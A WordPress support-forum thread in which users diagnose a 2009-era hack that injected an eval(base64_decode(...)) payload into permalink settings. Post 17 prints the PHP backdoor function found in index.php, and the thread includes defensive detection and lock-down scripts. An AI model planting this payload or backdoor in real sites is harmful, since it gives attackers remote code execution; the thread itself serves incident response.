[closed] Question About Possible Hack of Site (162 posts)

  1. ajaskey
    Member
    Posted 4 years ago #

    I noticed that some links are coming up with code in the link URL that I did not put there. I have not edited my site for several weeks. I have added posts but no PHP editing. So I am pretty sure I did not cause this. I noticed it tonight and don't think it has been like this for more than a day - maybe two. I am using version 2.7.1.

    This is the expected link:
    http://ptv-investing.com/blog/2009/09/03/30-year-bond-swing-chart-turns-down/

    This is what shows up in the Permalink and the "Recent Posts" and "Comments" widgets.

    http://ptv-investing.com/blog/2009/09/03/30-year-bond-swing-chart-turns-down/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

    Everything else seems to work. I checked the dates on the PHP files and none show recent updates. I checked the DB through examination of my daily backup and don't see any changes to the data in the DB.

    Any suggestions?

    Thanks.
    Andy

  2. ajaskey
    Member
    Posted 4 years ago #

    I updated to WP 2.8.4 which did not fix the problem. I deactivated all my plugins and this did not fix the Permalink issue.

  3. ajaskey
    Member
    Posted 4 years ago #

    In WP 2.8.4, the extra stuff shows up as the Permalink as I am creating a new post. But the extra characters:

    /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    are not editable. I would have thought that any hack would have been overwritten by the update to 2.8.4.

  4. ajaskey
    Member
    Posted 4 years ago #

    Ok. I looked at the Permalink options and somehow the extra characters went in there. Very odd. I guess I solved my problem. But I still would like to hear from a Blog guru or two about how this could have happened. I did not put it there and the string was not random so it doesn't look like an accident. Thanks. Andy

  5. gurubobnz
    Member
    Posted 4 years ago #

    Same deal with my wife's blog @ http://mummy.guru.net.nz/
    Similar story - regular posting but no upgrading or anything recently.
    Investigating now, found this post after Googling for the string appended onto the permalink URL.

  6. johninnit
    Member
    Posted 4 years ago #

    And same with one I work on http://www.touchstoneblog.org.uk -
    Likewise I found this via googling this exact string. Checked the permalinks page and all that gunk was indeed appended to my string, even though I'd not changed that setting in a year. Using version 2.7.1

    This is very odd. Going to check my other wordpress blogs now.

  7. Roy
    Member
    Posted 4 years ago #

    Dammit people, running old versions of WP is an application for getting hacked! And guru "WordPress 2.7-hemorrhage"?!? Your wife doesn't even use a final version of 2.7! Did you ever look up that word "hemorrhage"? It means that this test version leaks blood like a person shot to Swiss cheese with an automatic weapon.
    I don't know anything about this particular hack, but I advise you to after cleaning up the mess, upgrade, stay updated and read that nice article about Hardening WordPress in the codex.

  8. johninnit
    Member
    Posted 4 years ago #

    Yes - it's happened to another one too,
    http://www.strongerunions.org - which is on 2.62

    But oddly not to the other 6 wordpress blogs I run (yet).

  9. johninnit
    Member
    Posted 4 years ago #

    True Gangleri, will get busy upgrading!

  10. gurubobnz
    Member
    Posted 4 years ago #

    Fair cop Gangleri, upgraded to 2.8.4 now need to clean up. Looks like something managed to get into the custom permalink option. Removing it appears to fix the problem.

  11. Roy
    Member
    Posted 4 years ago #

    John, it's probably the work of some "scriptkiddy" or a bot looking for old WP's. It's still unclear to me what the purpose of this hack is. I found a nice article that describes how eval base functions are used to get information from databases, but the only thing interesting in that regard would be the users table in my opinion and why use the permalinks to do that? Maybe the hacker tries to get something from the computers of people clicking on the links? In any case, are the edited permalinks the only thing that happens? No new users, spam injections, filed edited or added?
    Reading tips:
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    When that's done:
    Change ALL passwords (yes I also mean database, FTP and control panel) and read this:
    http://codex.wordpress.org/Hardening_WordPress

    [edited]: just thought about something: decoded themes with the same kind of coding, coincidence?

  12. johninnit
    Member
    Posted 4 years ago #

    Thanks for all the help Gangleri, some very useful info there for novices like me!
    So that's my morning cut out for me then...

    Don't recognise any new users, or even if there are, they're only subscriber level, nothing author or above.

    No new posts/pages, and can't see any new folders or files on the server when sorting them by last update. So fingers crossed it was just someone proving they could change something, even if it wasn't any concrete use to them.

  13. dyske
    Member
    Posted 4 years ago #

    I just noticed the same problem on one of my blogs (PainInTheEnglish.com). So, this appears to be pretty widespread. Keeping up with WordPress's security issues is becoming a full-time job.

  14. lexthoonen
    Member
    Posted 4 years ago #

    I had the same. Thanks to the info here I was able to get rid of it. So thanks!

  15. erwanpia
    Member
    Posted 4 years ago #

  16. netslacker
    Member
    Posted 4 years ago #

    I am having the same problem. Multiple times now in the last 24 hours. I keep fixing it, it keeps coming back.

    Not sure what to do.

    permalinks end up with this crap:
    /%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

  17. netslacker
    Member
    Posted 4 years ago #

    The following function appeared in my index.php file. Everyone, check your last modified dates on your installation files for any file that has changed recently. If it's a wordpress file that you've not modified, be sure to inspect it or replace it with the original.

    function gpc_9086($l9088){
        if(is_array($l9088)){
            // recurse into every element of an array value
            foreach($l9088 as $l9086=>$l9087)$l9088[$l9086]=gpc_9086($l9087);
        }elseif(is_string($l9088) && substr($l9088,0,4)=="____"){
            // any string value beginning with "____" is base64-decoded and executed
            eval(base64_decode(substr($l9088,4)));$l9088=null;
        }
        return $l9088;
    }
    if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;
    // every $_SERVER entry (request headers included) is run through the function above
    array_map("gpc_9086",$_SERVER);
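    An added example, not code posted in this thread: a small Python checker for the two indicators reported so far, the altered permalink structure from the first posts and the function netslacker just posted. The list of structure tags is the set WordPress accepts in a custom permalink structure; the source markers are derived from the posted function; the permalink values and index.php contents it runs on are constructed samples.

```python
# Added example (not code from this thread): a checker for the two indicators
# reported above -- an injected permalink_structure option value and the
# gpc_NNNN-style backdoor function in PHP files -- run over constructed samples.
import os
import re

# Structure tags WordPress itself understands in a custom permalink structure.
WP_STRUCTURE_TAGS = {
    "year", "monthnum", "day", "hour", "minute", "second",
    "post_id", "postname", "category", "author",
}


def permalink_structure_issues(structure: str) -> list:
    """Return the problems found in a permalink_structure value (empty == clean).
    A legitimate structure is only '/' separators, plain path text and %tag%
    tokens from WP_STRUCTURE_TAGS; the injected string fails on both counts."""
    issues = []
    for ch in sorted(set(structure)):
        if not (ch.isalnum() or ch in "_%/.-"):
            issues.append(f"unexpected character {ch!r}")
    for tag in re.findall(r"%([^%/]*)%", structure):
        if tag not in WP_STRUCTURE_TAGS:
            issues.append(f"unknown tag %{tag}%")
    return issues


# Source-level markers taken from the posted function: eval of a base64 string,
# the four-underscore trigger prefix, and $_SERVER fed through a callback.
# The HTTP_REFERER marker covers the variant seen in the permalink payload.
BACKDOOR_MARKERS = {
    "eval(base64_decode(": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "____ trigger prefix": re.compile(
        r"substr\s*\([^)]*,\s*0\s*,\s*4\s*\)\s*==\s*['\"]____['\"]"),
    "$_SERVER mapped through callback": re.compile(
        r"array_map\s*\(\s*['\"]\w+['\"]\s*,\s*\$_SERVER\s*\)"),
    "$_SERVER[HTTP_REFERER] used as code": re.compile(
        r"\$_SERVER\s*\[\s*['\"]?HTTP_REFERER"),
}


def scan_php_source(source: str) -> list:
    """Names of the BACKDOOR_MARKERS that match the given PHP source text."""
    return [name for name, rx in BACKDOOR_MARKERS.items() if rx.search(source)]


def scan_tree(root: str) -> dict:
    """Map each .php file under root that matches at least one marker to its hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
                if hits:
                    findings[path] = hits
    return findings


# Constructed samples: a normal structure, the injected one from the thread,
# a stock-looking index.php, and the same file with the posted function prepended.
CLEAN_STRUCTURE = "/%year%/%monthnum%/%day%/%postname%/"
INJECTED_STRUCTURE = CLEAN_STRUCTURE + "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"
CLEAN_INDEX = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"
INJECTED_INDEX = (
    '<?php function gpc_9086($l9088){if(is_array($l9088)){foreach($l9088 as $l9086=>$l9087)'
    '$l9088[$l9086]=gpc_9086($l9087);}elseif(is_string($l9088) && substr($l9088,0,4)=="____")'
    '{eval(base64_decode(substr($l9088,4)));$l9088=null;}return $l9088;}'
    'if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_9086",$_SERVER); ?>\n'
    + CLEAN_INDEX
)

if __name__ == "__main__":
    print("clean structure:   ", permalink_structure_issues(CLEAN_STRUCTURE))
    print("injected structure:", permalink_structure_issues(INJECTED_STRUCTURE))
    print("clean index.php:   ", scan_php_source(CLEAN_INDEX))
    print("injected index.php:", scan_php_source(INJECTED_INDEX))
```

    Run scan_tree() against a copy of the web root to get the same file list netslacker built from modified dates, but keyed on content rather than timestamps, which an intruder can reset. The permalink check can be pointed at the permalink_structure row of wp_options from a database backup, which is where the first posts found the string.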

  18. patrickbryant
    Member
    Posted 4 years ago #

    Us too:

    %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    Upgraded and Backed up... will report if it comes back.

  19. Roy
    Member
    Posted 4 years ago #

    Great tip Netslacker, but Patrick, don't just patch, also do some "hardening" after changing all passwords, etc. You still don't know how they did it.

  20. ChloeAliceWilson
    Member
    Posted 4 years ago #

    @netslacker - as I'm a WordPress dummy please could you give me a clue as to how to check the last modified dates on my installation files! Thanks. My host is Hostgator, but I can't see any dates within File Manager.

  21. Roy
    Member
    Posted 4 years ago #

    Do you use FTP? Most FTP clients note the date of files.
    Also go for his tip and start by checking the index.php of your theme.

  22. Aaron Forgue
    Member
    Posted 4 years ago #

    Confirmed, two sites in our network (so far) have been hit by this exploit. Both were version 2.7.1.

    Symptoms: Bogus permalink, unauthorized admin account with code in the "first name" field.

    Has anyone been able to confirm that this is NOT an issue with 2.8.4?

  23. ChloeAliceWilson
    Member
    Posted 4 years ago #

    FTP - uugh - no. Hostgator has a few FTP icons but I've never used them and don't know what to do with them. I'll look at my index.php though. Thanks.

  24. netslacker
    Member
    Posted 4 years ago #

    @ChloeAliceWilson

    You need to log in to your hosting account and look at all the files. I've got shell access so I can just check and modify directly there. However, if you're coming in via web, there should be a way to view all the files on your hosting account and it should tell you last modified timestamps.

    I have files that were modified over a couple of days. Starting on Aug 30th. All of those files (about 10 in total) have had the function above injected.

  25. netslacker
    Member
    Posted 4 years ago #

    My steps for cleaning did not involve following those on the links above.

    I found that I could easily replace the hacked files with valid ones. I then removed the write permission on all wordpress files. However, doing this kills the ability to upgrade via the admin console and will make upgrades harder. For me though, I'm all about having a stable site and I don't care right now about upgrading.

    I also created a blank index.php file in EVERY directory that didn't have one already (/images, wp-content, etc etc). Since when I looked through my installation, MANY directories had NEW index.php files that would simply call the injected function. So I removed these files, created a new, blank index.php and then removed the read and write permissions (removing write means nobody can inject bad code again into that file).

    If you have index.php files that have the function, a hacker can simply call the function over and over again by making an http call to the file w/ their browser. voila, function executes, hack restored. So you must prevent this from occurring over and over.

    On linux/unix, to remove write permissions (must be at a shell):
    chmod -w <filename>

    So, for all files in the root:
    chmod -w *.php

    To create an index.php file where there is NOT one:
    touch index.php (creates an empty file)
    chmod -rw index.php (removes read and write)

    Now, if a browser goes to http://myhackedsite/wp-content/ the browser returns a PERMISSION DENIED error. Since the file is there but it's not readable.

    Be CAREFUL. Some files need write access. But not many. And DON'T remove the read access from index.php files that are part of the wordpress install. root and wp-admin (and others) have VALID index.php files. just inspect them for the malicious function and just remove the write attribute (chmod -w filename).

    I removed the write attribute from nearly every file in wordpress and my theme that I am using. this was my quick and dirty way to HOPEFULLY prevent it from happening again. Since in the past 3 days I've had it occur multiple times.

    If there is a better approach, I'm all ears. However, until a fix is put in wordpress I'm not taking any chances at all.
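    The triage and lock-down steps from the post above, as an added Python script that is not netslacker's own commands. It lists PHP files modified after a cutoff, finds directories with no index.php, creates empty ones there and strips the write bits from every .php file, with a dry-run mode so the change list can be reviewed first, and a restore function for the owner write bit before an admin-console upgrade. One deliberate difference from the post: the empty index.php files stay readable, since an empty file already stops directory listing without the PERMISSION DENIED response an unreadable one produces. The WordPress-like tree it runs on is a constructed sample in a temporary directory.

```python
# Added example (not netslacker's own commands): triage and lock-down steps
# from the post above with a dry-run mode, exercised on a constructed tree.
import os
import stat
import tempfile
import time

WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH


def php_files(root):
    """Absolute paths of every .php file under root, walked top-down."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                yield os.path.join(dirpath, name)


def recently_modified(root, since_epoch):
    """PHP files whose mtime is at or after since_epoch, newest first: the
    files to inspect or replace from a pristine copy of the same version."""
    hits = [(os.stat(p).st_mtime, p) for p in php_files(root)]
    return [p for m, p in sorted(hits, reverse=True) if m >= since_epoch]


def dirs_without_index(root):
    """Directories under root that have no index.php of their own."""
    return sorted(d for d, _dirs, files in os.walk(root) if "index.php" not in files)


def lock_down(root, dry_run=True):
    """Create an empty index.php where one is missing and remove write
    permission from every .php file. Returns (created, made_read_only) path
    lists; with dry_run=True nothing changes and the lists show what would."""
    created = []
    for d in dirs_without_index(root):
        path = os.path.join(d, "index.php")
        if not dry_run:
            open(path, "x").close()  # "x": fail rather than clobber a real file
        created.append(path)
    read_only = []
    for path in php_files(root):
        mode = os.stat(path).st_mode
        if mode & WRITE_BITS:
            if not dry_run:
                os.chmod(path, mode & ~WRITE_BITS)
            read_only.append(path)
    return created, read_only


def restore_write(root):
    """Give the owner write access back (needed before an admin-console upgrade)."""
    restored = []
    for path in php_files(root):
        mode = os.stat(path).st_mode
        if not mode & stat.S_IWUSR:
            os.chmod(path, mode | stat.S_IWUSR)
            restored.append(path)
    return restored


def make_sample_tree():
    """Constructed sample: a tiny WordPress-like tree in a temp dir where only
    one theme file was touched in the last day. Returns (root, cutoff_epoch)."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    now = time.time()
    old = now - 90 * 86400
    layout = {
        "index.php": old,
        "wp-admin/index.php": old,
        "wp-content/themes/x/index.php": now,
    }
    for rel, mtime in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php // sample file\n")
        os.utime(path, (mtime, mtime))
    os.makedirs(os.path.join(root, "images"))  # no index.php, like /images above
    return root, now - 86400


if __name__ == "__main__":
    root, cutoff = make_sample_tree()
    print("modified in the last day:", recently_modified(root, cutoff))
    print("dirs lacking index.php:  ", dirs_without_index(root))
    created, read_only = lock_down(root, dry_run=False)
    print(f"created {len(created)} index.php files, made {len(read_only)} files read-only")
```

    Point make_sample_tree() aside and call lock_down(web_root, dry_run=True) on a real install first; the returned lists are what to review before running it for real. Files that WordPress must write to (uploads, a cache directory, wp-config.php on some hosts) are the exceptions the post warns about.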

  26. dyske
    Member
    Posted 4 years ago #

    @netslacker

    When one of my WP sites got hacked earlier this year, I did similar things to "harden" my WP sites, but it got hacked again by this new scheme anyway. The problem is that you protected your site only from this particular hacker and his scheme. When another security hole is discovered, it may have nothing to do with what you just did.

    I agree with you; all I want is a stable site. I don't care about upgrading all the time to the latest. But with WP, it appears that we have no choice. Every time a new version comes out, we have to upgrade it. If so, doing what you did would make it a big hassle every time you have to upgrade. If you only have one site to maintain, that's fine, but what if you have multiple? It's not realistic. Most of us just want to blog. We don't want to be professional webmasters. So, this is a serious problem that I do not know how to resolve. I don't want to spend my time upgrading WP every week.

  27. marc_dutch123
    Member
    Posted 4 years ago #

    The best quick fix I found is renaming:
    wp-admin/options-permalink.php
    /xmlrpc.php

    to something else and wait till the wordpress guys fix this... there were 4 attempts today on my website...

  28. netslacker
    Member
    Posted 4 years ago #

    @dyske

    Totally agree. I guess my point is that I'm not aware of a "fix" for this particular hack and since I've had it happen now multiple times I just want it stable so I can sleep at night!!

    Doing a recursive chmod to add back the write permissions is trivial. If I want to get back to where I was and upgrade I simply run the chmod +rw command on the whole thing and I'm good to go.

    However, since removing the write attribute is a sound security practice anyway (no matter if it's wp or some other app), it's still valid advice. The drawback is that wp is built for the masses for easy upgrade through the admin console, so by its nature, it will be prone to hacks. Security always has a trade off. Many people chase the upgrades to get new features like kids on Christmas morning. However, my approach is to always wait until the issues are resolved before upgrading (unless it's a security patch/upgrade).

  29. dyske
    Member
    Posted 4 years ago #

    @marc_dutch123

    I deleted xmlrpc.php from all my WP sites. I don't care about Ping Back and I don't have to update my blog from my iPhone.

    Does xmlrpc.php do anything other than those two?

    [I'm suspecting that xmlrpc.php was the entry point for this hack.]

  30. robk30
    Member
    Posted 4 years ago #

    My blog was infected. I am thinking of deleting xmlrpc.php as well. I also see wp-pass.php. Should I delete both?

Topic Closed

This topic has been closed to new replies.